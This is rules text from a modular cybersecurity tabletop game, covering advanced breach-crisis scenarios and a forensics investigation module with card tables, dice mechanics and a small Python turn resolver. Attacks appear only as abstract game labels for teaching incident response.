- Set aside 10 Budget at setup as a legal reserve (unavailable for actions)
- Turn-5 Special Event: vendor declares bankruptcy — Board trust -10
Complexity: ADVANCED Attacker: Current employee, not external hacker Primary Challenge: Organizational trauma and trust collapse
Description: During investigation of the external breach, the forensic team discovers:
- The "external breach" had help from an insider
- Employee provided the attacker with access/credentials
- Employee may have also exfiltrated data
- Employee is still working at the company (not yet caught)

Key Complications:
- Who is involved?
  - Single rogue employee?
  - Conspiracy (multiple employees)?
  - Which departments are involved?
- Motive:
  - Disgruntled employee selling data
  - Corporate espionage (hired by competitor)
  - Theft for personal gain
  - Political/ideological motivation
- Scope:
  - What other systems did the insider compromise?
  - What data did they access/steal?
  - How long were they active?
  - Are there other insiders?
- HR/Legal:
  - Fire the employee immediately (risks legal action)
  - Continue employment while investigating (ethics question)
  - Involve law enforcement (police investigation)
  - Civil litigation from employee (wrongful termination claims)

Organizational Impact:
- Trust in employees collapses
- Morale plummets (people suspect each other)
- Staff paranoia increases
- Executive distraction (investigating insider)

Special Events:
- Turn 2: Forensics discovers insider involvement
- Turn 3: HR/Legal team must decide: fire or investigate?
- Turn 4: If fired, wrongful termination lawsuit likely
- Turn 4: If not fired, employee may destroy more evidence
- Turn 5: Law enforcement investigation (if reported to police)

Team Decisions:
1. Immediately fire employee (legal risk but stops damage)
2. Continue employment while investigating (ethical but risky)
3. Involve law enforcement (criminal investigation, slow)
4. Settle potential lawsuits preemptively (expensive)

Investigation Complexity:
- Cannot trust the employee's explanations
- Must verify what the employee had access to
- Must recover deleted data/logs
- Must interview other employees
- Investigation takes much longer (suspicious of everyone)

Cost Implications:
- Extended forensics: +15 Budget (investigating employee)
- Legal: +25 Budget (employment law, potential settlements)
- HR investigation: +8 Budget (interview staff, background checks)
- Remediation: +20 Budget (credential reset, system rebuild)
- Potential lawsuit: Millions if significant

Communication Challenge:
- Cannot publicly disclose insider involvement (defamation risk)
- Regulators and customers demand explanation
- Media: "Company had insider threat"
- Board: "Why was security so bad?"

Difficulty (v2.2):
- Investigation advances are halved until Investigation reaches 50% (internal accounts cannot be trusted)
- Executive trust starts at 60% (instead of 80%)
- ACTION-08 (Credential Reset) is effectively mandatory — if not completed by end of Turn 6, EVENT-08 (Second Breach) fires automatically
SCENARIO-05: Critical Infrastructure

Complexity: ADVANCED+
Sector: Utilities, Healthcare, Transportation, Manufacturing
Primary Challenge: Physical safety takes priority over cybersecurity response
Description: Breach affects critical infrastructure where compromise could cause physical harm:
- Healthcare: Hospital network compromise during surgery (patient safety risk)
- Utilities: Power grid compromise during storm (people without power/heat)
- Transportation: Traffic system compromise (accidents possible)
- Manufacturing: Production system compromise (equipment failure)

Key Complication: Safety > Security
- Cannot shut down the system for forensics if people would be harmed
- Cannot remediate if it requires system downtime
- Incident response must preserve operational safety
- Must balance security investigation with operational continuity

Regulatory Escalation:
- CISA (Cybersecurity and Infrastructure Security Agency) involved immediately
- National Incident Command System (NICS) may take over
- Government mandates response (not optional)
- Military/intelligence agencies may be involved
- Cannot investigate without government approval

Special Considerations:
- Lives are at stake (not just data)
- Response priorities are: Safety → Containment → Investigation
- Traditional forensics may be impossible (system must stay operational)
- Attacker knows the system is critical (leverage for negotiation)

Special Events:
- Turn 1: CISA declaration of critical infrastructure incident
- Turn 2: Government takes partial control of response (may override company decisions)
- Turn 3-4: Attacker threatens system shutdown (extortion using safety risk)
- Turn 5: Coordinated media/government briefings (national security implications)

Team Decisions:
1. Continue operations (risk of safety incident) or shut down (risk to people without service)?
2. Engage with government agencies (lose control of response)
3. Negotiate with attacker (payment may violate OFAC sanctions if the actor is sanctioned; government will weigh in)
4. Accept potential service interruption (for safety)

Cost Implications:
- Immediate government response: +50 Budget (federal agencies)
- Operational impact: Unknown (depends on what breaks)
- Remediation: Cannot shut down system (very limited options)
- Investigation: Deferred (safety is priority)
- National security classification: Investigation may be classified (cannot discuss publicly)

Communication Challenge:
- Cannot disclose security details (national security)
- Cannot disclose full scope (might encourage copycat attacks)
- Public panic risk (if people know infrastructure is vulnerable)
- Media cannot report full details (government requests)

Difficulty (v2.2):
- Remediation advances are halved (systems must stay operational — no downtime allowed)
- Communication advances -5% (national security disclosure restrictions; minimum +5%)
- ACTION-13 PAY is unavailable (government prohibits payment)
- Turn-1 Special Event: CISA declaration — Regulator trust starts at 50% but ACTION-10 gives +25 instead of +20 (cooperation is rewarded)
SCENARIO-06: Stock Crash

Complexity: ADVANCED
Trigger: Negative media coverage + analyst downgrades
Primary Challenge: Managing a financial crisis alongside the security crisis
Description: Public company stock price crashes following the breach announcement:
- News of breach announced
- Stock drops 10-20% in first day
- Short-sellers amplify negative sentiment
- Analysts downgrade stock rating
- Institutional investors sell (panic selling)
- Stock drops 30-50% or more

Key Complications:
- Financial Crisis:
  - Company loses market value ($1B+ in some cases)
  - Credit rating downgrade possible
  - Difficulty accessing credit markets
  - Acquisition at depressed price possible
- Board/Shareholder Panic:
  - Shareholders demand CEO removal
  - Board may fire executives immediately
  - Board may accept lowball acquisition offer
  - Media coverage of internal turmoil
- Business Disruption:
  - Employee morale crashes (stock is part of compensation)
  - Key employees leave (seeking more stable companies)
  - Customer confidence drops
  - Supplier payment delays (credit rating issue)
  - Business slows due to loss of employee focus

Investor Psychology:
- Fear-driven selling (stock is a "falling knife")
- Rumors spread (company is a bankruptcy risk)
- Technical traders amplify selling (algorithmic trading)
- Recovery takes months/years even if the breach is minor

Special Events:
- Turn 1: Stock drops 20% (breach announcement)
- Turn 2: Analyst downgrades (stock drops another 15%)
- Turn 3: Media "Death Spiral" narrative ("Company Doomed")
- Turn 4: Short-seller report (negative narrative amplified)
- Turn 5: Activist investor demands board change
- Turn 6: Acquisition offer from vulture investor (lowball)
- Turn 7: Board may accept acquisition (loses independence)

Team Decisions:
1. Focus on crisis response (stock takes care of itself)
2. Spend effort on investor relations (PR effort)
3. Respond to activist pressure (appeasement or defiance?)
4. Accept acquisition offer or fight it?

Indirect Crisis Complications:
- Cannot spend freely on response (stock-based credit)
- May need to cut crisis response budget (unexpected)
- Board becomes distracted (shareholder meetings, hostile negotiations)
- Executives leave (job market is competitive)
- Crisis response effectiveness drops

Cost Implications:
- Investor relations campaign: +10 Budget
- Board/shareholder meetings: Distraction (-10 effectiveness)
- Potential acquisition: Loss of independence
- Employee departures: Loss of key expertise
- Credit access: May be restricted (raises costs)

Communication Challenge:
- Must manage investor narrative (balance hope + realism)
- Must appear competent (or stock collapses further)
- Media attention is intense (every statement scrutinized)
- Cannot show weakness (stock market punishes)

Difficulty (v2.2):
- Board trust starts at 50% (instead of 70%)
- Budget -10 at setup (credit crunch)
- EVENT-09 (Shareholder Pressure) fires at Turn 3 AND Turn 5 (it is scheduled twice this game)
SCENARIO-07: Triple Compromise

Complexity: ADVANCED+
Multiple Simultaneous Compromises: Systems encrypted + data stolen + email account compromised
Primary Challenge: Responding to multiple attack objectives simultaneously
Description: Not a single attack but multiple overlapping compromises:
1. Ransomware: File servers encrypted (production stops, cannot access files)
2. Data Breach: Database stolen (customer data exfiltrated)
3. Email Compromise: CEO's email account compromised (attacker can send as CEO)

Key Complications:
- Attacker has multiple leverage points:
  - "Pay ransom or systems stay encrypted" (operational pressure)
  - "Pay to prevent data publication" (financial/reputational pressure)
  - "Stop responding or we'll send fake CEO email" (social engineering pressure)
- Investigation difficulty:
  - Multiple attack vectors to investigate
  - May be different attackers or a coordinated campaign
  - Each compromise has a different timeline
  - Cannot determine if attacks are related or independent
- Remediation priorities clash:
  - Decrypt systems immediately (get operations back)
  - Recover stolen data (prevent publication)
  - Secure CEO email account (prevent further compromise)
  - Cannot do all three at once (budget/time constraints)

Special Complications:
- Fake CEO Email Risk:
  - Attacker sends email as CEO
  - "Approves" emergency spending
  - "Authorizes" data transfers
  - "Orders" employee actions
  - Teams cannot tell if email is real
- Timeline Acceleration:
  - Email compromise creates urgency
  - Attacker can impersonate executives
  - Must immediately notify all employees
  - Breach of trust (employees distrust CEO emails)

Special Events:
- Turn 1: Discovery of ransomware + data breach
- Turn 2: Discovery of CEO email compromise
- Turn 3: Fake CEO email sends "emergency transfer" (employees confused)
- Turn 4: Attacker threatens to send more fake emails (escalation)
- Turn 5: Ransom deadline, data publication deadline, email account deadline (all converging)

Investigation Complexity:
- Three separate forensics investigations (expensive)
- Each compromise requires a different approach
- Timelines may overlap (more complexity)
- May be related (same attacker) or unrelated (unlucky)

Cost Implications:
- Triple forensics: +20 Budget (investigating all three)
- Triple ransom/extortion demands: $10M+ total
- Remediation: +25 Budget (rebuild files, backup, email security)
- Communication: +15 Budget (notifying employees about fake emails)
- Regulatory fines: Stacked (multiple breach types)

Team Decisions:
1. Which compromise to prioritize? (Cannot fix all simultaneously)
2. Pay multiple ransoms or negotiate a single amount?
3. How to prevent fake CEO emails during the investigation?
4. How to rebuild trust after the email compromise?

Communication Challenge:
- Must warn employees about fake emails (careful wording)
- Cannot fully disclose CEO email compromise (executive embarrassment)
- Must appear to have control (or stock crashes)
- Media narrative: "Multiple breaches mean security is very bad"

Difficulty (v2.2):
- +2 turns of events: EVENT-08 (Second Breach) is pre-armed and fires automatically at Turn 6 (once) — the game runs 10 turns
- All track advances -5% (three simultaneous investigations; minimum +5%)
- The ransom deadline covers all three extortion threats — one ACTION-13 decision resolves them together
SCENARIO-08: M&A Complications

Complexity: ADVANCED+
Context: Breach happens while the company is being acquired or merging
Primary Challenge: Managing the breach while deal dynamics change
Description: Breach is discovered during a critical phase of an M&A transaction:
- Company announced acquisition/merger
- Deal closes in 30-45 days
- Due diligence is underway (acquirer evaluating company)
- Breach discovered mid-deal
- Acquirer may walk away (reduces deal value or terminates)
- Regulators may block deal (antitrust, security concerns)

Key Complications:
- Deal Dynamics:
  - Acquirer discovers breach during due diligence
  - Acquirer may lower offer price (leverage)
  - Acquirer may demand warranty/escrow (financial penalty)
  - Deal may fail entirely (destroys shareholder value)
- Information Control:
  - Acquirer has limited information (still under NDA)
  - Seller has incentive to minimize breach
  - Acquirer has incentive to maximize perceived severity
  - Buyer/seller information asymmetry complicates response
- Regulatory Issues:
  - Merger may be blocked for security concerns
  - FTC may demand security improvements (delay deal)
  - State regulators may oppose merger (security risk)
  - Deal timing already tight (additional scrutiny delays close)
- Board Pressure:
  - Board wants to preserve deal value
  - May demand minimal response (to not disclose full scope)
  - May pressure executives to downplay breach
  - Creates pressure for inadequate response

Timeline Pressure:
- Deal must close in 30-45 days
- Breach response takes time
- Regulatory review adds time
- Conflicting priorities: Deal vs. Response

Special Events:
- Turn 1: Breach discovered, acquirer learns in due diligence
- Turn 2: Acquirer threatens to walk away (leverage)
- Turn 3: Price renegotiation (acquirer lowers offer 10-20%)
- Turn 4: Regulatory delay (FTC requests documents)
- Turn 5: Deal extension negotiations (need more time for breach response)
- Turn 6: Shareholder lawsuit (shareholders allege breach was hidden)

Team Decisions:
1. Full disclosure to acquirer (cooperation but deal value drops)
2. Minimal disclosure (preserve deal but fraud risk)
3. Separate negotiation: breach response vs. acquisition terms
4. Push for deal delay (to respond properly to breach)

Complex Incentives:
- Company wants:
  - Deal to close at a good price
  - Breach to be minimized
  - Acquirer to handle breach remediation
- Acquirer wants:
  - Full disclosure of breach
  - Lower price to account for risk
  - Warranties that seller covers breach costs
- Regulators want:
  - Full investigation
  - Breach remediation
  - Assurance of future security
  - May block if combined entity is too powerful

Cost Implications:
- Breach response: Standard costs (+20-30 Budget)
- Deal renegotiation: Millions in lost value
- Regulatory review: Delays (may block deal)
- Shareholder lawsuit: If breach was hidden, liability
- Escrow/warranty: Seller may have to hold money as security

Communication Challenge:
- Cannot disclose full breach details (acquirer has leverage)
- Cannot hide breach (fraud risk)
- Must negotiate simultaneously with acquirer + regulators + investigators
- Media discovery complicates (stock price pressure)

Difficulty (v2.2):
- Communication advances are halved (every statement is reviewed by two legal teams)
- Board trust starts at 50% (deal-preservation pressure to under-respond)
- Turn-3 Special Event: price renegotiation — Board trust -10 if Investigation is below 25% (the board can't answer the acquirer's questions)
| Scenario | Title | Difficulty | Key Pressure |
|---|---|---|---|
| SCENARIO-01 | Multi-Region Legal | HIGH | 3 different regulatory timelines |
| SCENARIO-02 | Ransomware Extortion | HIGH | $10M decision + data publication threat |
| SCENARIO-03 | Supply Chain Liability | HIGH | Vendor failure, customer trust |
| SCENARIO-04 | Insider Threat | HIGH | Organizational trust collapse |
| SCENARIO-05 | Critical Infrastructure | EXTREME | Lives at risk, government control |
| SCENARIO-06 | Stock Crash | HIGH | Financial crisis + board pressure |
| SCENARIO-07 | Triple Compromise | EXTREME | 3 simultaneous attacks, multiple ransoms |
| SCENARIO-08 | M&A Complications | EXTREME | Deal value + regulatory blocks |
Use if:
- Playing with experienced crisis management teams
- Want sophisticated, realistic scenarios
- Have time for complex decision-making (add 20-30 min per scenario)
- Want to teach cascading effects of bad decisions

Skip if:
- Playing with beginners (too complex)
- Want simpler, faster gameplay
- Limited time available
- Focus is on learning basics

Start with easier scenarios:
1. SCENARIO-01 (Multi-Region): Complex but straightforward
2. SCENARIO-02 (Ransomware): Familiar from news, clear choices
3. SCENARIO-04 (Insider): Interesting organizational dynamics

Progress to harder scenarios:
4. SCENARIO-03 (Supply Chain): Adds liability complexity
5. SCENARIO-06 (Stock Crash): Financial crisis layer

Reserve for expert play:
6. SCENARIO-05 (Critical Infrastructure): Government involvement changes everything
7. SCENARIO-07 (Triple Compromise): Multiple simultaneous crises
8. SCENARIO-08 (M&A): Extreme complexity, conflicts of interest
Disaster Recovery Module: Advanced Crisis Scenarios (Expansion)
Part of Incident Zero, a modular cybersecurity board game · v2.2 - Playtest Edition
docs/rules/module-forensics.md
Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)"; see v2.2 Playtest Edition Changes)
Last Updated: July 2026
The Forensics Module teaches incident investigation, digital forensics, and attack attribution. This module is typically entered after Incident Response or Disaster Recovery (representing the investigation phase of response) but can also be played standalone to teach forensic analysis concepts.
Rather than detecting the attack or managing the crisis, Forensics focuses on the crucial post-breach investigation phase:
- Evidence collection and preservation
- Timeline reconstruction of attacker actions
- Attack chain analysis linking findings to MITRE ATT&CK techniques
- Attribution and threat intelligence (who did this and how?)
- Attack surface analysis (how did they get in?)
- Lessons learned for future hardening and network building

How the modules relate:
- Incident Response: Teaches proactive threat detection
- Hardening (typically after an IR win): Teaches proactive defense
- Disaster Recovery (typically after an IR loss): Teaches crisis management
- Forensics (after IR or DR): Teaches investigation and learning
Forensics can also be played standalone to teach forensic methodology without the preceding modules.
In Campaign Play:
1. After Incident Response failure (undetected breach) → Forensics Phase
2. After Disaster Recovery (crisis management) → Forensics Phase
3. After Hardening success (discovered attack) → Optional Forensics for deeper learning

In Standalone Play:
- Forensics module can be played independently as a 45-90 minute investigation scenario

Outputs from Forensics:
- Attack Chain Reconstruction: Detailed understanding of how the attacker progressed
- Vulnerability Discovery: Systems and methods exploited
- Threat Intelligence: IOCs (Indicators of Compromise), malware samples, attacker infrastructure
- Timeline Evidence: When each compromise occurred

Used In:
- Hardening Module: "Build defenses against the techniques discovered in forensics"
- Network Building Module: "Redesign network architecture knowing how the attacker pivoted"
- Audit & Compliance Module: "Assess coverage of controls that should have detected forensic findings"
Trigger Options:
- After Incident Response or Disaster Recovery: Blue Team now investigates for attribution and deeper understanding
- Standalone Setup: Team starts a fresh investigation (no prior IR/DR)
When entering Forensics after IR or DR, the Threat Orchestrator reveals the attack context:
Example (After IR Success): "Your security team detected and contained an attack chain:
1. Phishing email (SOCIAL ENGINEERING)
2. Credential harvesting malware (MALWARE)
3. Lateral movement to admin account (CREDENTIAL ABUSE)

Now you investigate to understand: How deep did they get? Are there other persistence mechanisms? Can we attribute this to a known threat group?"

Example (After DR/IR Failure): "Forensic examination of compromised systems reveals:
1. Initial access via credential stuffing (CREDENTIAL ABUSE)
2. Privilege escalation via unpatched service (WEB EXPLOIT)
3. Persistence through scheduled task modification (MALWARE)
4. Data exfiltration via DNS tunneling (DATA EXFIL)

Now you reconstruct the complete timeline and attribute the attack."
These represent forensic investigation techniques and evidence collection methods.
Standard Investigation Actions:
| Card | Technique | DC | Cost | Time | Result |
|---|---|---|---|---|---|
| DISK-01 | Disk Image & Analysis | 12 | 10 | 2 turns | Recover deleted files, malware samples |
| DISK-02 | File System Carving | 14 | 15 | 3 turns | Deep file recovery, hidden artifacts |
| MEM-01 | Memory Dump & Analysis | 13 | 15 | 2 turns | Volatile process info, injected code |
| MEM-02 | Memory Forensics Deep Dive | 15 | 20 | 3 turns | Malware behavior, command-and-control |
| LOG-01 | Event Log Analysis | 11 | 5 | 1 turn | Timeline of user actions, logins |
| LOG-02 | Deep Log Correlation | 13 | 10 | 2 turns | Cross-system timeline, attack sequence |
| NET-01 | Network Traffic Analysis | 12 | 10 | 2 turns | Exfiltration evidence, C2 communications |
| NET-02 | Packet Capture Deep Analysis | 14 | 15 | 3 turns | Protocol-level forensics, attacker tools |
| MALW-01 | Malware Analysis (Dynamic) | 12 | 15 | 2 turns | Behavior analysis, IOCs |
| MALW-02 | Malware Analysis (Static) | 14 | 10 | 2 turns | Code reverse engineering, capabilities |
| TIMELINE-01 | Timeline Reconstruction | 13 | 5 | 1 turn | Chronological attack sequence |
| THREAT-01 | Threat Attribution Analysis | 15 | 20 | 3 turns | Link to known groups, TTPs |
DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1.
Investigation Action Card Structure:
- Title: e.g., "Disk Image & Analysis"
- Technique: MITRE ATT&CK reference (e.g., "Forensic Analysis")
- Difficulty Class (DC): Roll d20+modifiers vs. this number to succeed
- Cost: Budget required to perform the investigation
- Duration: Number of turns this investigation takes
- What It Reveals: Type of evidence discovered (see Evidence Cards below)
- Success Condition: d20+forensics_skill vs. DC (11+ usually succeeds, but higher-DC cards reward skilled investigators)
Investigation Duration (v2.2): Starting an investigation with Duration N occupies your action on the turn you start it (pay the Budget cost then). Count the turn you start it as turn 1: the results (evidence + meter advances) arrive — and the roll is made — at the START of turn N. So Duration 1 resolves immediately on the same turn; Duration 2 resolves at the start of the following turn; Duration 3 resolves two turns after starting. Only ONE multi-turn (Duration 2+) investigation may be in flight at a time, but you may take other actions (Analyze Evidence, Follow Lead, or a Duration 1 investigation) while waiting.
These represent specific findings from investigations. They document what was discovered and provide investigative leads.
Categories of Evidence (core deck counts):

A. Malware & Persistence (4 cards: EVD-01, EVD-03, EVD-08, EVD-10)
- Trojan samples with capabilities (spyware, RAT, backdoor)
- Persistence mechanisms (scheduled tasks, registry modifications, startup folders)
- Encryption keys recovered from malware or memory
- Malware behavior profiles from sandbox analysis

B. Credentials & Access (1 card: EVD-04)
- Admin account compromise timeline
- Suspicious logins from unusual times, locations, or sources

C. Lateral Movement (1 card: EVD-05)
- Pass-the-hash evidence
- Tools used for pivoting
- Systems accessed with each credential

D. Exfiltration (1 card: EVD-06)
- Volume of data exfiltrated
- File types extracted
- Destination IP addresses or domains
- Timing of exfiltration windows

E. Attack Infrastructure (2 cards: EVD-02, EVD-07)
- Command-and-control servers
- Malware staging servers
- Registrar information (domain registration)
- ASN and geolocation data

F. Attack Activity (3 cards: EVD-09, EVD-11, EVD-12)
- Attacker command history
- File staging artifacts (what was collected before exfiltration)
- Anti-forensics evidence (log deletion, timestamp manipulation)

Evidence Card Structure:
- Title: Specific finding (e.g., "Credential Dumper Malware")
- Type: Category (Malware, Persistence, Credentials, Movement, Exfiltration, Infrastructure, Timeline)
- MITRE ATT&CK Technique: Referenced technique (e.g., T1003 - OS Credential Dumping)
- Description: What was found and where
- Investigation Source: Which Investigation Action card led to this
- Investigative Lead: What the Blue Team can do with this information
- Connection to Attack Chain: Links back to specific Threat cards from the IR phase (if sequential)
These represent the conclusions of the forensic investigation and feed into recommendations.
Finding Types:
| Finding | Description | Feeds Into Module |
|---|---|---|
| FIND-01: Threat Attribution Report | Identified attacker group, techniques, motivations | Hardening, Audit & Compliance (threat model), Incident Response |
| FIND-02: Attack Surface Analysis | Systems/methods exploited; entry points identified | Network Building, Hardening, Audit |
| FIND-03: Persistence Mechanisms Discovered | How attacker maintained access; backdoors identified | Hardening (remove persistence), Disaster Recovery, Audit |
| FIND-04: Investigative Gaps & Recommendations | Questions answered vs. remaining; next steps | Audit & Compliance (post-incident review), Training |
Physical Components:
- Investigation Action cards (12 cards)
- Evidence cards (12 cards)
- Findings cards (4 cards)
- Turn Tracker (8-15 turns typical)
- Budget Tracker (Investigation budget: 0-100)
- Progress Meters (see below):
  - Timeline Completeness (0-100%)
  - Attack Chain Reconstruction (0-100%)
  - Attribution Confidence (0-100%)
  - Evidence Chain of Custody (0-100%)

Optional:
- Investigation Flow Chart (showing how actions lead to evidence discovery)
- MITRE ATT&CK Technique reference sheet
- Evidence correlation board (physical board or spreadsheet linking evidence)

Turn Structure:
- Easy (TIER 1): 6-8 turns | Simple attack, few pivot points, obvious artifacts
- Medium (TIER 2): 8-10 turns | Standard breach with some obfuscation
- Hard (TIER 3): 11-13 turns | Complex attack, sophisticated attacker, limited logging
- Expert (TIER 4): 14-15 turns | APT-level sophistication, anti-forensics measures, encrypted communications

Turn Length Determination: Using the Variable Turn Length System (see Core Rules):
1. Threat Orchestrator selects attack complexity tier
2. Roll d4 for variation (-1, 0, 0, +1)
3. Announce final turn count to Blue Team

Investigation Budget:
- Starting Budget: 75 (represents forensic lab time, tools, personnel)
- Optional Bonus: +25 if the company has cyber insurance or a threat intelligence subscription
- Budget Tracker Range (v2.2): 0-100 (75 base + 25 optional bonus is the maximum starting value)
Each turn, the Blue Team performs ONE of these actions:
Description: The team describes a specific forensic investigation they want to perform.
Mechanics:
1. Choose Investigation Card: Select from available Investigation Action cards (Disk, Memory, Logs, Network, Malware, Timeline, or Attribution)
2. Pay Cost: Spend Budget equal to card cost (paid on the turn you start the investigation)
3. Resolve Duration (v2.2): If Duration is 2+, the roll and results wait until the START of the turn the investigation completes (see Investigation Duration rule above)
4. Roll: d20 + relevant skill modifier vs. Difficulty Class on card
   - Modifiers:
     - +2 if team has forensics background
     - +1 if a prior Investigation Action revealed clues to this technique
     - +1 if team provides a detailed narrative explanation of the investigation approach
     - -2 if the investigation is being done hastily (using extra turn pressure to rush)
5. Check Results:
   - Success (roll ≥ DC): Discover ONE Evidence card — unless the card says otherwise (v2.2: MEM-02 and NET-02 award TWO) — and apply that Evidence card's printed meter impacts (see No Double Counting, Rule 5)
   - Partial Success (roll DC-2 to DC-1): Discover PARTIAL Evidence (partial timeline, hints of compromise, etc.) and apply the investigation card's partial-success advance line
   - Failure (roll < DC-2): No Evidence discovered this turn; Budget still spent

Progress Meter Advancement: Each successful Investigation Action advances one or more Progress Meters. Typical advances are +5-35% per meter (major breakthroughs can exceed +20%):
- Timeline Completeness (+5-35%): Evidence that establishes temporal sequence
- Attack Chain Reconstruction (+5-35%): Evidence linking attacker actions together
- Attribution Confidence (+5-35%): Evidence pointing to threat actor identity
- Evidence Chain of Custody: advances via the Chain of Custody rule (v2.2, Rule 1) and the printed impacts on some Evidence cards
Example Investigation:
Blue Team: "We want to conduct a disk image and analysis of the compromised server."
Cost: 10 Budget (paid now). DISK-01 has Duration 2, so the team's action this turn is starting the imaging; results arrive at the start of the next turn.
DC: 12
Blue Team Roll (at the start of the next turn): d20 + 2 (forensics background) = 15
Result: Success! Discover Evidence card EVD-01 "Credential Dumper Malware" and apply its printed impacts: Attack Chain +15%, Attribution +10%, Timeline +10%. The team states the binary was hashed (SHA-256) before analysis: Chain of Custody +5% (v2.2)
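To make the Investigation Duration rule and the success/partial/failure bands concrete, here is a small Python resolver. It is an added example, not a file from the game's bundle: the card table is copied from the Investigation Action table above, while the `Investigation` class, `outcome`, `resolution_turn` and the meter names are this example's own. It enforces the v2.2 constraints (Budget paid at start, one Duration 2+ investigation in flight, roll only once the resolution turn arrives, the DISK-01 rush option) and replays the DISK-01 walkthrough just above.

```python
"""Resolver for Investigation Actions under the v2.2 Duration rule (added example)."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Investigation Action cards as printed in the module table: (DC, Cost, Duration in turns).
CARDS: Dict[str, Tuple[int, int, int]] = {
    "DISK-01": (12, 10, 2), "DISK-02": (14, 15, 3),
    "MEM-01": (13, 15, 2), "MEM-02": (15, 20, 3),
    "LOG-01": (11, 5, 1), "LOG-02": (13, 10, 2),
    "NET-01": (12, 10, 2), "NET-02": (14, 15, 3),
    "MALW-01": (12, 15, 2), "MALW-02": (14, 10, 2),
    "TIMELINE-01": (13, 5, 1), "THREAT-01": (15, 20, 3),
}
RUSH_COST = 5  # v2.2 rush option: DISK-01 at Duration 1 for +5 Budget (15 total)


def modifier(forensics_background: bool = False, prior_clue: bool = False,
             detailed_narrative: bool = False, rushed: bool = False) -> int:
    """Sum of the four printed modifiers: +2, +1, +1 and -2."""
    return 2 * forensics_background + prior_clue + detailed_narrative - 2 * rushed


def outcome(total: int, dc: int) -> str:
    """Success at total >= DC, partial success in the DC-2..DC-1 band, failure below."""
    if total >= dc:
        return "success"
    if total >= dc - 2:
        return "partial"
    return "failure"


def resolution_turn(start_turn: int, duration: int) -> int:
    """Count the starting turn as turn 1; the roll and results arrive at the START of turn N."""
    return start_turn + duration - 1


@dataclass
class Investigation:
    """Blue Team state: Budget, current turn, the single in-flight Duration 2+ card, meters."""
    budget: int = 75
    turn: int = 1
    in_flight: Optional[Dict] = None
    meters: Dict[str, int] = field(default_factory=lambda: {
        "timeline": 0, "attack_chain": 0, "attribution": 0, "custody": 0})

    def can_start(self, card: str, rush: bool = False) -> Tuple[bool, str]:
        """Check the three start constraints before any Budget is spent."""
        _dc, cost, duration = CARDS[card]
        if rush:
            if card != "DISK-01":
                return False, "only DISK-01 has a rush option"
            cost, duration = cost + RUSH_COST, 1
        if cost > self.budget:
            return False, "not enough Budget"
        if duration >= 2 and self.in_flight is not None:
            return False, "only one Duration 2+ investigation may be in flight"
        return True, ""

    def start(self, card: str, rush: bool = False, **mods: bool) -> Dict:
        """Pay the cost now; the roll happens on the resolution turn."""
        ok, reason = self.can_start(card, rush)
        if not ok:
            raise ValueError(reason)
        dc, cost, duration = CARDS[card]
        if rush:
            cost, duration = cost + RUSH_COST, 1
        self.budget -= cost
        pending = {"card": card, "dc": dc, "mod": modifier(**mods),
                   "resolves": resolution_turn(self.turn, duration)}
        if duration >= 2:
            self.in_flight = pending
        return pending

    def next_turn(self) -> int:
        self.turn += 1
        return self.turn

    def ready(self, pending: Dict) -> bool:
        return self.turn >= pending["resolves"]

    def roll(self, pending: Dict, d20: int, impacts: Optional[Dict[str, int]] = None,
             preservation_stated: bool = False) -> str:
        """Resolve a pending card. On success apply the Evidence card's printed impacts
        (supplied by the caller) plus +5% Chain of Custody when preservation is stated.
        Partial successes use the card's own partial-advance line, which is not modeled."""
        if not self.ready(pending):
            raise ValueError("results are not ready until turn %d" % pending["resolves"])
        if self.in_flight is pending:
            self.in_flight = None
        result = outcome(d20 + pending["mod"], pending["dc"])
        if result == "success" and impacts:
            for meter, pct in impacts.items():
                self.meters[meter] = min(100, self.meters[meter] + pct)
            if preservation_stated:
                self.meters["custody"] = min(100, self.meters["custody"] + 5)
        return result
```

Replaying the walkthrough: starting DISK-01 on turn 3 with the forensics background drops Budget to 65 and schedules the roll for turn 4; a d20 of 13 becomes 15 against DC 12, a success, and EVD-01's printed impacts plus the stated SHA-256 preservation land on the meters at the start of turn 4. A LOG-01 started on that same turn resolves immediately, and a 9 against its DC 11 falls in the partial band.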
Description: The team reviews evidence cards already discovered and makes connections.
Cost (v2.2): 5 Budget. Each Evidence card can be Analyzed only once (v2.2) — mark cards as Analyzed when they are included in this action.
Mechanics:
1. Pay Cost: Spend 5 Budget (v2.2)
2. Review Evidence: Team looks at 2-4 not-yet-Analyzed Evidence cards already discovered
3. Make Connection: Team describes how the findings are related (temporal, technical, or attribution-based)
4. Roll: d20 + relevant skill vs. DC 10
   - Modifiers:
     - +2 if team connects 3+ evidence cards in a coherent narrative
     - +1 if connection references a specific MITRE ATT&CK technique
5. Check Results:
   - Success (roll ≥ 10): Gain insight; advance two Progress Meters by 5-10% each
   - Failure (roll < 10): No progress; action still costs a turn (represents time spent on dead-end analysis)
Example Analysis:
Blue Team: "The malware sample found in memory matches the persistence mechanism in the scheduled task, suggesting the attacker uploaded the same tool twice. This indicates they knew what they were doing and weren't just randomly exploring."
Roll: d20 + 2 (good narrative) = 16
Result: Success! +10% Attribution Confidence (skilled attacker), +10% Attack Chain Reconstruction (coordinated multi-stage attack)
Description: Based on existing evidence, the team pursues a specific investigative thread.
Cost (v2.2): 5 Budget (printed cost for every Follow Investigative Lead action).
Mechanics:
1. Pay Cost: Spend 5 Budget (v2.2)
2. Choose Evidence Card: Pick an Evidence card with an "Investigative Lead"
3. Describe Approach: How will the team pursue this lead? (e.g., "Track the C2 domain to registrar records to find other registered domains")
4. Roll: d20 + relevant skill vs. DC (varies 11-14 depending on lead)
5. Check Results:
   - Success: Discover a new Evidence card directly related to the lead and apply its printed meter impacts (v2.2: if no suitable undiscovered Evidence card exists, advance Attribution Confidence +20% instead — never both)
   - Partial Success: Discover related evidence but get a false lead (discover 1 Evidence + 1 Red Herring card)
   - Failure: Dead-end lead; use the turn without discovering evidence
Example Lead:
Evidence Card: "Command-and-Control Communications (IP: 203.0.113.45)"
Investigative Lead: "Perform ASN and WHOIS lookup to find other infrastructure operated by this attacker"
Blue Team: "Let's trace the IP's ASN and registrar records to find other malicious domains."
Cost: 5 Budget (v2.2)
Roll: d20 + 1 (good idea) = 14 vs. DC 12
Result: Success! Discover EVD-07 "Attacker Infrastructure Map" and apply its printed impacts: Attribution +30%, Attack Chain +15%, Timeline +10%. Team documents WHOIS/passive-DNS exports: Chain of Custody +5% (v2.2)
The Blue Team achieves ONE of these:
Victory Condition 1: "Full Attribution"
